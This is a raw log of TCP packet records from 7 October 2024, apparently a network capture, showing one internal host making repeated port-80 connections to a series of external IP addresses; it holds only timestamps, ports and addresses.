Oct 7, 2024 11:52:50.434808016 CEST	80	49786	199.59.243.227	192.168.11.30
Oct 7, 2024 11:52:50.434932947 CEST	49786	80	192.168.11.30	199.59.243.227
Oct 7, 2024 11:52:51.841129065 CEST	49786	80	192.168.11.30	199.59.243.227
Oct 7, 2024 11:52:52.860434055 CEST	49787	80	192.168.11.30	199.59.243.227
Oct 7, 2024 11:52:52.955064058 CEST	80	49787	199.59.243.227	192.168.11.30
Oct 7, 2024 11:52:52.955241919 CEST	49787	80	192.168.11.30	199.59.243.227
Oct 7, 2024 11:52:52.967976093 CEST	49787	80	192.168.11.30	199.59.243.227
Oct 7, 2024 11:52:53.062809944 CEST	80	49787	199.59.243.227	192.168.11.30
Oct 7, 2024 11:52:53.062902927 CEST	80	49787	199.59.243.227	192.168.11.30
Oct 7, 2024 11:52:53.062913895 CEST	80	49787	199.59.243.227	192.168.11.30
Oct 7, 2024 11:52:53.070846081 CEST	80	49787	199.59.243.227	192.168.11.30
Oct 7, 2024 11:52:53.071100950 CEST	80	49787	199.59.243.227	192.168.11.30
Oct 7, 2024 11:52:53.071113110 CEST	80	49787	199.59.243.227	192.168.11.30
Oct 7, 2024 11:52:53.071263075 CEST	49787	80	192.168.11.30	199.59.243.227
Oct 7, 2024 11:52:53.076517105 CEST	80	49787	199.59.243.227	192.168.11.30
Oct 7, 2024 11:52:53.076700926 CEST	49787	80	192.168.11.30	199.59.243.227
Oct 7, 2024 11:52:54.481255054 CEST	49787	80	192.168.11.30	199.59.243.227
Oct 7, 2024 11:52:55.500138044 CEST	49788	80	192.168.11.30	199.59.243.227
Oct 7, 2024 11:52:55.594768047 CEST	80	49788	199.59.243.227	192.168.11.30
Oct 7, 2024 11:52:55.594971895 CEST	49788	80	192.168.11.30	199.59.243.227
Oct 7, 2024 11:52:55.602654934 CEST	49788	80	192.168.11.30	199.59.243.227
Oct 7, 2024 11:52:55.697206020 CEST	80	49788	199.59.243.227	192.168.11.30
Oct 7, 2024 11:52:55.704905987 CEST	80	49788	199.59.243.227	192.168.11.30
Oct 7, 2024 11:52:55.705003023 CEST	80	49788	199.59.243.227	192.168.11.30
Oct 7, 2024 11:52:55.705013037 CEST	80	49788	199.59.243.227	192.168.11.30
Oct 7, 2024 11:52:55.705409050 CEST	49788	80	192.168.11.30	199.59.243.227
Oct 7, 2024 11:52:55.708684921 CEST	49788	80	192.168.11.30	199.59.243.227
Oct 7, 2024 11:52:55.712322950 CEST	80	49788	199.59.243.227	192.168.11.30
Oct 7, 2024 11:52:55.712434053 CEST	49788	80	192.168.11.30	199.59.243.227
Oct 7, 2024 11:52:55.803112030 CEST	80	49788	199.59.243.227	192.168.11.30
Oct 7, 2024 11:53:00.957446098 CEST	49790	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:01.118622065 CEST	80	49790	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:01.118789911 CEST	49790	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:01.130692959 CEST	49790	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:01.291443110 CEST	80	49790	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:01.303680897 CEST	80	49790	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:01.303705931 CEST	80	49790	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:01.303719044 CEST	80	49790	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:01.303812027 CEST	49790	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:01.303888083 CEST	80	49790	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:01.303940058 CEST	80	49790	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:01.304054022 CEST	49790	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:01.304200888 CEST	80	49790	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:01.304250956 CEST	80	49790	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:01.304264069 CEST	80	49790	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:01.304322004 CEST	80	49790	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:01.304374933 CEST	80	49790	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:01.304447889 CEST	49790	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:01.304636955 CEST	49790	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:01.304636955 CEST	49790	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:01.304652929 CEST	80	49790	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:01.304872990 CEST	49790	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:02.635663033 CEST	49790	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:03.654608965 CEST	49791	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:03.815773010 CEST	80	49791	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:03.815928936 CEST	49791	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:03.834153891 CEST	49791	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:03.995778084 CEST	80	49791	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:04.007240057 CEST	80	49791	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:04.007286072 CEST	80	49791	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:04.007298946 CEST	80	49791	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:04.007309914 CEST	80	49791	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:04.007322073 CEST	80	49791	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:04.007349014 CEST	80	49791	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:04.007522106 CEST	49791	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:04.007879019 CEST	80	49791	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:04.007932901 CEST	80	49791	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:04.007945061 CEST	80	49791	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:04.007956028 CEST	80	49791	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:04.007967949 CEST	80	49791	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:04.008088112 CEST	49791	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:04.008254051 CEST	49791	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:05.338099003 CEST	49791	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:06.357347965 CEST	49792	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:06.514935017 CEST	80	49792	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:06.515166044 CEST	49792	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:06.527235031 CEST	49792	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:06.527282953 CEST	49792	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:06.685014963 CEST	80	49792	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:06.685028076 CEST	80	49792	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:06.697001934 CEST	80	49792	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:06.697205067 CEST	80	49792	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:06.697326899 CEST	80	49792	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:06.697379112 CEST	80	49792	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:06.697451115 CEST	49792	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:06.697581053 CEST	80	49792	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:06.697598934 CEST	49792	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:06.697632074 CEST	80	49792	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:06.697643995 CEST	80	49792	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:06.697655916 CEST	80	49792	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:06.697736025 CEST	80	49792	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:06.697747946 CEST	80	49792	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:06.697760105 CEST	80	49792	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:06.697819948 CEST	49792	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:06.697945118 CEST	49792	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:08.040549040 CEST	49792	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:09.059844971 CEST	49793	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:09.220932961 CEST	80	49793	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:09.221100092 CEST	49793	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:09.228904963 CEST	49793	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:09.389667034 CEST	80	49793	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:09.400053024 CEST	80	49793	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:09.400090933 CEST	80	49793	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:09.400115967 CEST	80	49793	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:09.400428057 CEST	49793	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:09.400584936 CEST	80	49793	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:09.400605917 CEST	80	49793	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:09.400628090 CEST	80	49793	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:09.400654078 CEST	80	49793	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:09.400675058 CEST	80	49793	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:09.400738955 CEST	80	49793	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:09.400741100 CEST	80	49793	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:09.400823116 CEST	49793	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:09.400823116 CEST	49793	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:09.400919914 CEST	49793	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:09.400998116 CEST	49793	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:09.401129961 CEST	80	49793	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:09.401335955 CEST	49793	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:09.405630112 CEST	49793	80	192.168.11.30	184.94.215.26
Oct 7, 2024 11:53:09.566267014 CEST	80	49793	184.94.215.26	192.168.11.30
Oct 7, 2024 11:53:14.598912954 CEST	49794	80	192.168.11.30	76.223.105.230
Oct 7, 2024 11:53:14.692698956 CEST	80	49794	76.223.105.230	192.168.11.30
Oct 7, 2024 11:53:14.692878962 CEST	49794	80	192.168.11.30	76.223.105.230
Oct 7, 2024 11:53:14.704696894 CEST	49794	80	192.168.11.30	76.223.105.230
Oct 7, 2024 11:53:14.809000015 CEST	80	49794	76.223.105.230	192.168.11.30
Oct 7, 2024 11:53:14.811536074 CEST	80	49794	76.223.105.230	192.168.11.30
Oct 7, 2024 11:53:14.811548948 CEST	80	49794	76.223.105.230	192.168.11.30
Oct 7, 2024 11:53:14.811726093 CEST	49794	80	192.168.11.30	76.223.105.230
Oct 7, 2024 11:53:14.818371058 CEST	80	49794	76.223.105.230	192.168.11.30
Oct 7, 2024 11:53:14.818521023 CEST	49794	80	192.168.11.30	76.223.105.230
Oct 7, 2024 11:53:16.210642099 CEST	49794	80	192.168.11.30	76.223.105.230
Oct 7, 2024 11:53:17.229598999 CEST	49795	80	192.168.11.30	76.223.105.230
Oct 7, 2024 11:53:17.323333025 CEST	80	49795	76.223.105.230	192.168.11.30
Oct 7, 2024 11:53:17.323580027 CEST	49795	80	192.168.11.30	76.223.105.230
Oct 7, 2024 11:53:17.335352898 CEST	49795	80	192.168.11.30	76.223.105.230
Oct 7, 2024 11:53:17.435555935 CEST	80	49795	76.223.105.230	192.168.11.30
Oct 7, 2024 11:53:17.442954063 CEST	80	49795	76.223.105.230	192.168.11.30
Oct 7, 2024 11:53:17.443042994 CEST	80	49795	76.223.105.230	192.168.11.30
Oct 7, 2024 11:53:17.443272114 CEST	49795	80	192.168.11.30	76.223.105.230
Oct 7, 2024 11:53:17.451122999 CEST	80	49795	76.223.105.230	192.168.11.30
Oct 7, 2024 11:53:17.451299906 CEST	49795	80	192.168.11.30	76.223.105.230
Oct 7, 2024 11:53:18.850694895 CEST	49795	80	192.168.11.30	76.223.105.230
Oct 7, 2024 11:53:19.873907089 CEST	49796	80	192.168.11.30	76.223.105.230
Oct 7, 2024 11:53:19.967612028 CEST	80	49796	76.223.105.230	192.168.11.30
Oct 7, 2024 11:53:19.967803001 CEST	49796	80	192.168.11.30	76.223.105.230
Oct 7, 2024 11:53:19.979509115 CEST	49796	80	192.168.11.30	76.223.105.230
Oct 7, 2024 11:53:20.079142094 CEST	80	49796	76.223.105.230	192.168.11.30
Oct 7, 2024 11:53:20.079153061 CEST	80	49796	76.223.105.230	192.168.11.30
Oct 7, 2024 11:53:20.079160929 CEST	80	49796	76.223.105.230	192.168.11.30
Oct 7, 2024 11:53:20.082837105 CEST	80	49796	76.223.105.230	192.168.11.30
Oct 7, 2024 11:53:20.082947016 CEST	80	49796	76.223.105.230	192.168.11.30
Oct 7, 2024 11:53:20.083101034 CEST	49796	80	192.168.11.30	76.223.105.230
Oct 7, 2024 11:53:20.090377092 CEST	80	49796	76.223.105.230	192.168.11.30
Oct 7, 2024 11:53:20.090523958 CEST	49796	80	192.168.11.30	76.223.105.230
Oct 7, 2024 11:53:21.490611076 CEST	49796	80	192.168.11.30	76.223.105.230
Oct 7, 2024 11:53:22.509445906 CEST	49797	80	192.168.11.30	76.223.105.230
Oct 7, 2024 11:53:22.603490114 CEST	80	49797	76.223.105.230	192.168.11.30
Oct 7, 2024 11:53:22.603671074 CEST	49797	80	192.168.11.30	76.223.105.230
Oct 7, 2024 11:53:22.611362934 CEST	49797	80	192.168.11.30	76.223.105.230
Oct 7, 2024 11:53:22.718029022 CEST	80	49797	76.223.105.230	192.168.11.30
Oct 7, 2024 11:53:22.718056917 CEST	80	49797	76.223.105.230	192.168.11.30
Oct 7, 2024 11:53:22.718066931 CEST	80	49797	76.223.105.230	192.168.11.30
Oct 7, 2024 11:53:22.718302965 CEST	49797	80	192.168.11.30	76.223.105.230
Oct 7, 2024 11:53:22.721723080 CEST	49797	80	192.168.11.30	76.223.105.230
Oct 7, 2024 11:53:22.722487926 CEST	80	49797	76.223.105.230	192.168.11.30
Oct 7, 2024 11:53:22.722645044 CEST	49797	80	192.168.11.30	76.223.105.230
Oct 7, 2024 11:53:22.822273016 CEST	80	49797	76.223.105.230	192.168.11.30
Oct 7, 2024 11:53:28.268507004 CEST	49798	80	192.168.11.30	121.254.178.239
Oct 7, 2024 11:53:28.554141045 CEST	80	49798	121.254.178.239	192.168.11.30
Oct 7, 2024 11:53:28.554305077 CEST	49798	80	192.168.11.30	121.254.178.239
Oct 7, 2024 11:53:28.566169024 CEST	49798	80	192.168.11.30	121.254.178.239
Oct 7, 2024 11:53:28.851947069 CEST	80	49798	121.254.178.239	192.168.11.30
Oct 7, 2024 11:53:28.862284899 CEST	80	49798	121.254.178.239	192.168.11.30
Oct 7, 2024 11:53:28.862354994 CEST	80	49798	121.254.178.239	192.168.11.30
Oct 7, 2024 11:53:28.862526894 CEST	49798	80	192.168.11.30	121.254.178.239
Oct 7, 2024 11:53:30.082464933 CEST	49798	80	192.168.11.30	121.254.178.239
Oct 7, 2024 11:53:31.101330042 CEST	49799	80	192.168.11.30	121.254.178.239
Oct 7, 2024 11:53:31.396855116 CEST	80	49799	121.254.178.239	192.168.11.30
Oct 7, 2024 11:53:31.397061110 CEST	49799	80	192.168.11.30	121.254.178.239
Oct 7, 2024 11:53:31.408710957 CEST	49799	80	192.168.11.30	121.254.178.239
Oct 7, 2024 11:53:31.704154015 CEST	80	49799	121.254.178.239	192.168.11.30
Oct 7, 2024 11:53:31.711213112 CEST	80	49799	121.254.178.239	192.168.11.30
Oct 7, 2024 11:53:31.711226940 CEST	80	49799	121.254.178.239	192.168.11.30
Oct 7, 2024 11:53:31.711345911 CEST	49799	80	192.168.11.30	121.254.178.239
Oct 7, 2024 11:53:32.925503016 CEST	49799	80	192.168.11.30	121.254.178.239
Oct 7, 2024 11:53:33.944406033 CEST	49800	80	192.168.11.30	121.254.178.239
Oct 7, 2024 11:53:34.231548071 CEST	80	49800	121.254.178.239	192.168.11.30
Oct 7, 2024 11:53:34.231753111 CEST	49800	80	192.168.11.30	121.254.178.239
Oct 7, 2024 11:53:34.244731903 CEST	49800	80	192.168.11.30	121.254.178.239
Oct 7, 2024 11:53:34.244790077 CEST	49800	80	192.168.11.30	121.254.178.239
Oct 7, 2024 11:53:34.531944036 CEST	80	49800	121.254.178.239	192.168.11.30
Oct 7, 2024 11:53:34.539506912 CEST	80	49800	121.254.178.239	192.168.11.30
Oct 7, 2024 11:53:34.539520979 CEST	80	49800	121.254.178.239	192.168.11.30
Oct 7, 2024 11:53:34.539767027 CEST	49800	80	192.168.11.30	121.254.178.239
Oct 7, 2024 11:53:35.753025055 CEST	49800	80	192.168.11.30	121.254.178.239
Oct 7, 2024 11:53:36.772051096 CEST	49801	80	192.168.11.30	121.254.178.239
Oct 7, 2024 11:53:37.054572105 CEST	80	49801	121.254.178.239	192.168.11.30
Oct 7, 2024 11:53:37.054800987 CEST	49801	80	192.168.11.30	121.254.178.239
Oct 7, 2024 11:53:37.062755108 CEST	49801	80	192.168.11.30	121.254.178.239
Oct 7, 2024 11:53:37.345392942 CEST	80	49801	121.254.178.239	192.168.11.30
Oct 7, 2024 11:53:37.347417116 CEST	80	49801	121.254.178.239	192.168.11.30
Oct 7, 2024 11:53:37.347429037 CEST	80	49801	121.254.178.239	192.168.11.30
Oct 7, 2024 11:53:37.347753048 CEST	49801	80	192.168.11.30	121.254.178.239
Oct 7, 2024 11:53:37.351327896 CEST	49801	80	192.168.11.30	121.254.178.239
Oct 7, 2024 11:53:37.633954048 CEST	80	49801	121.254.178.239	192.168.11.30
Oct 7, 2024 11:53:42.489902020 CEST	49802	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:53:42.589835882 CEST	80	49802	3.33.130.190	192.168.11.30
Oct 7, 2024 11:53:42.590065956 CEST	49802	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:53:42.601903915 CEST	49802	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:53:42.701572895 CEST	80	49802	3.33.130.190	192.168.11.30
Oct 7, 2024 11:53:42.704643011 CEST	80	49802	3.33.130.190	192.168.11.30
Oct 7, 2024 11:53:42.704780102 CEST	49802	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:53:44.110507965 CEST	49802	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:53:44.209734917 CEST	80	49802	3.33.130.190	192.168.11.30
Oct 7, 2024 11:53:45.129704952 CEST	49803	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:53:45.229677916 CEST	80	49803	3.33.130.190	192.168.11.30
Oct 7, 2024 11:53:45.229890108 CEST	49803	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:53:45.242136002 CEST	49803	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:53:45.342127085 CEST	80	49803	3.33.130.190	192.168.11.30
Oct 7, 2024 11:53:45.344336033 CEST	80	49803	3.33.130.190	192.168.11.30
Oct 7, 2024 11:53:45.344506025 CEST	49803	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:53:46.750648975 CEST	49803	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:53:46.850630045 CEST	80	49803	3.33.130.190	192.168.11.30
Oct 7, 2024 11:53:47.769684076 CEST	49804	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:53:47.869652033 CEST	80	49804	3.33.130.190	192.168.11.30
Oct 7, 2024 11:53:47.869929075 CEST	49804	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:53:47.882894039 CEST	49804	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:53:47.882931948 CEST	49804	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:53:47.982846975 CEST	80	49804	3.33.130.190	192.168.11.30
Oct 7, 2024 11:53:47.982961893 CEST	80	49804	3.33.130.190	192.168.11.30
Oct 7, 2024 11:53:47.982978106 CEST	80	49804	3.33.130.190	192.168.11.30
Oct 7, 2024 11:53:47.985826969 CEST	80	49804	3.33.130.190	192.168.11.30
Oct 7, 2024 11:53:47.985991001 CEST	49804	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:53:49.390552998 CEST	49804	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:53:49.500055075 CEST	80	49804	3.33.130.190	192.168.11.30
Oct 7, 2024 11:53:50.409490108 CEST	49805	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:53:50.519751072 CEST	80	49805	3.33.130.190	192.168.11.30
Oct 7, 2024 11:53:50.520031929 CEST	49805	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:53:50.527168989 CEST	49805	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:53:50.626487017 CEST	80	49805	3.33.130.190	192.168.11.30
Oct 7, 2024 11:53:51.522947073 CEST	80	49805	3.33.130.190	192.168.11.30
Oct 7, 2024 11:53:51.522964001 CEST	80	49805	3.33.130.190	192.168.11.30
Oct 7, 2024 11:53:51.523284912 CEST	49805	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:53:51.526895046 CEST	49805	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:53:51.530637980 CEST	80	49805	3.33.130.190	192.168.11.30
Oct 7, 2024 11:53:51.530796051 CEST	49805	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:53:51.626178026 CEST	80	49805	3.33.130.190	192.168.11.30
Oct 7, 2024 11:53:56.829865932 CEST	49806	80	192.168.11.30	161.97.168.245
Oct 7, 2024 11:53:57.004791021 CEST	80	49806	161.97.168.245	192.168.11.30
Oct 7, 2024 11:53:57.004978895 CEST	49806	80	192.168.11.30	161.97.168.245
Oct 7, 2024 11:53:57.016539097 CEST	49806	80	192.168.11.30	161.97.168.245
Oct 7, 2024 11:53:57.191626072 CEST	80	49806	161.97.168.245	192.168.11.30
Oct 7, 2024 11:53:57.191991091 CEST	80	49806	161.97.168.245	192.168.11.30
Oct 7, 2024 11:53:57.192066908 CEST	80	49806	161.97.168.245	192.168.11.30
Oct 7, 2024 11:53:57.192078114 CEST	80	49806	161.97.168.245	192.168.11.30
Oct 7, 2024 11:53:57.192333937 CEST	49806	80	192.168.11.30	161.97.168.245
Oct 7, 2024 11:53:58.529119968 CEST	49806	80	192.168.11.30	161.97.168.245
Oct 7, 2024 11:53:59.547987938 CEST	49807	80	192.168.11.30	161.97.168.245
Oct 7, 2024 11:53:59.718594074 CEST	80	49807	161.97.168.245	192.168.11.30
Oct 7, 2024 11:53:59.718843937 CEST	49807	80	192.168.11.30	161.97.168.245
Oct 7, 2024 11:53:59.730465889 CEST	49807	80	192.168.11.30	161.97.168.245
Oct 7, 2024 11:53:59.900989056 CEST	80	49807	161.97.168.245	192.168.11.30
Oct 7, 2024 11:53:59.901441097 CEST	80	49807	161.97.168.245	192.168.11.30
Oct 7, 2024 11:53:59.901453018 CEST	80	49807	161.97.168.245	192.168.11.30
Oct 7, 2024 11:53:59.901467085 CEST	80	49807	161.97.168.245	192.168.11.30
Oct 7, 2024 11:53:59.901752949 CEST	49807	80	192.168.11.30	161.97.168.245
Oct 7, 2024 11:54:01.247391939 CEST	49807	80	192.168.11.30	161.97.168.245
Oct 7, 2024 11:54:02.266237974 CEST	49808	80	192.168.11.30	161.97.168.245
Oct 7, 2024 11:54:02.445802927 CEST	80	49808	161.97.168.245	192.168.11.30
Oct 7, 2024 11:54:02.445966959 CEST	49808	80	192.168.11.30	161.97.168.245
Oct 7, 2024 11:54:02.457475901 CEST	49808	80	192.168.11.30	161.97.168.245
Oct 7, 2024 11:54:02.457525969 CEST	49808	80	192.168.11.30	161.97.168.245
Oct 7, 2024 11:54:02.636590958 CEST	80	49808	161.97.168.245	192.168.11.30
Oct 7, 2024 11:54:02.636684895 CEST	80	49808	161.97.168.245	192.168.11.30
Oct 7, 2024 11:54:02.636831999 CEST	80	49808	161.97.168.245	192.168.11.30
Oct 7, 2024 11:54:02.637006044 CEST	80	49808	161.97.168.245	192.168.11.30
Oct 7, 2024 11:54:02.637027025 CEST	80	49808	161.97.168.245	192.168.11.30
Oct 7, 2024 11:54:02.637058973 CEST	80	49808	161.97.168.245	192.168.11.30
Oct 7, 2024 11:54:02.637156010 CEST	49808	80	192.168.11.30	161.97.168.245
Oct 7, 2024 11:54:03.965337992 CEST	49808	80	192.168.11.30	161.97.168.245
Oct 7, 2024 11:54:04.984621048 CEST	49809	80	192.168.11.30	161.97.168.245
Oct 7, 2024 11:54:05.157350063 CEST	80	49809	161.97.168.245	192.168.11.30
Oct 7, 2024 11:54:05.157578945 CEST	49809	80	192.168.11.30	161.97.168.245
Oct 7, 2024 11:54:05.166220903 CEST	49809	80	192.168.11.30	161.97.168.245
Oct 7, 2024 11:54:05.338346004 CEST	80	49809	161.97.168.245	192.168.11.30
Oct 7, 2024 11:54:05.338562012 CEST	80	49809	161.97.168.245	192.168.11.30
Oct 7, 2024 11:54:05.338669062 CEST	80	49809	161.97.168.245	192.168.11.30
Oct 7, 2024 11:54:05.338768959 CEST	80	49809	161.97.168.245	192.168.11.30
Oct 7, 2024 11:54:05.339025974 CEST	49809	80	192.168.11.30	161.97.168.245
Oct 7, 2024 11:54:05.344851017 CEST	49809	80	192.168.11.30	161.97.168.245
Oct 7, 2024 11:54:05.517149925 CEST	80	49809	161.97.168.245	192.168.11.30
Oct 7, 2024 11:54:11.018868923 CEST	49810	80	192.168.11.30	185.104.28.27
Oct 7, 2024 11:54:11.190309048 CEST	80	49810	185.104.28.27	192.168.11.30
Oct 7, 2024 11:54:11.190459013 CEST	49810	80	192.168.11.30	185.104.28.27
Oct 7, 2024 11:54:11.201009989 CEST	49810	80	192.168.11.30	185.104.28.27
Oct 7, 2024 11:54:11.372586966 CEST	80	49810	185.104.28.27	192.168.11.30
Oct 7, 2024 11:54:11.372750998 CEST	80	49810	185.104.28.27	192.168.11.30
Oct 7, 2024 11:54:11.372886896 CEST	80	49810	185.104.28.27	192.168.11.30
Oct 7, 2024 11:54:11.373059988 CEST	49810	80	192.168.11.30	185.104.28.27
Oct 7, 2024 11:54:12.713418961 CEST	49810	80	192.168.11.30	185.104.28.27
Oct 7, 2024 11:54:13.732290983 CEST	49811	80	192.168.11.30	185.104.28.27
Oct 7, 2024 11:54:13.902853012 CEST	80	49811	185.104.28.27	192.168.11.30
Oct 7, 2024 11:54:13.903074980 CEST	49811	80	192.168.11.30	185.104.28.27
Oct 7, 2024 11:54:13.912760973 CEST	49811	80	192.168.11.30	185.104.28.27
Oct 7, 2024 11:54:14.083491087 CEST	80	49811	185.104.28.27	192.168.11.30
Oct 7, 2024 11:54:14.083508968 CEST	80	49811	185.104.28.27	192.168.11.30
Oct 7, 2024 11:54:14.083519936 CEST	80	49811	185.104.28.27	192.168.11.30
Oct 7, 2024 11:54:14.083591938 CEST	49811	80	192.168.11.30	185.104.28.27
Oct 7, 2024 11:54:15.415887117 CEST	49811	80	192.168.11.30	185.104.28.27
Oct 7, 2024 11:54:16.435256958 CEST	49812	80	192.168.11.30	185.104.28.27
Oct 7, 2024 11:54:16.606029987 CEST	80	49812	185.104.28.27	192.168.11.30
Oct 7, 2024 11:54:16.606235981 CEST	49812	80	192.168.11.30	185.104.28.27
Oct 7, 2024 11:54:16.619117022 CEST	49812	80	192.168.11.30	185.104.28.27
Oct 7, 2024 11:54:16.619154930 CEST	49812	80	192.168.11.30	185.104.28.27
Oct 7, 2024 11:54:16.790133953 CEST	80	49812	185.104.28.27	192.168.11.30
Oct 7, 2024 11:54:16.790146112 CEST	80	49812	185.104.28.27	192.168.11.30
Oct 7, 2024 11:54:16.790206909 CEST	80	49812	185.104.28.27	192.168.11.30
Oct 7, 2024 11:54:16.790271997 CEST	80	49812	185.104.28.27	192.168.11.30
Oct 7, 2024 11:54:16.790282011 CEST	80	49812	185.104.28.27	192.168.11.30
Oct 7, 2024 11:54:16.790366888 CEST	49812	80	192.168.11.30	185.104.28.27
Oct 7, 2024 11:54:18.134063005 CEST	49812	80	192.168.11.30	185.104.28.27
Oct 7, 2024 11:54:19.153078079 CEST	49813	80	192.168.11.30	185.104.28.27
Oct 7, 2024 11:54:19.323836088 CEST	80	49813	185.104.28.27	192.168.11.30
Oct 7, 2024 11:54:19.324083090 CEST	49813	80	192.168.11.30	185.104.28.27
Oct 7, 2024 11:54:19.331899881 CEST	49813	80	192.168.11.30	185.104.28.27
Oct 7, 2024 11:54:19.502197981 CEST	80	49813	185.104.28.27	192.168.11.30
Oct 7, 2024 11:54:19.502284050 CEST	80	49813	185.104.28.27	192.168.11.30
Oct 7, 2024 11:54:19.502295017 CEST	80	49813	185.104.28.27	192.168.11.30
Oct 7, 2024 11:54:19.502706051 CEST	49813	80	192.168.11.30	185.104.28.27
Oct 7, 2024 11:54:19.506156921 CEST	49813	80	192.168.11.30	185.104.28.27
Oct 7, 2024 11:54:19.676425934 CEST	80	49813	185.104.28.27	192.168.11.30
Oct 7, 2024 11:54:24.855123997 CEST	49814	80	192.168.11.30	37.140.192.23
Oct 7, 2024 11:54:25.069056034 CEST	80	49814	37.140.192.23	192.168.11.30
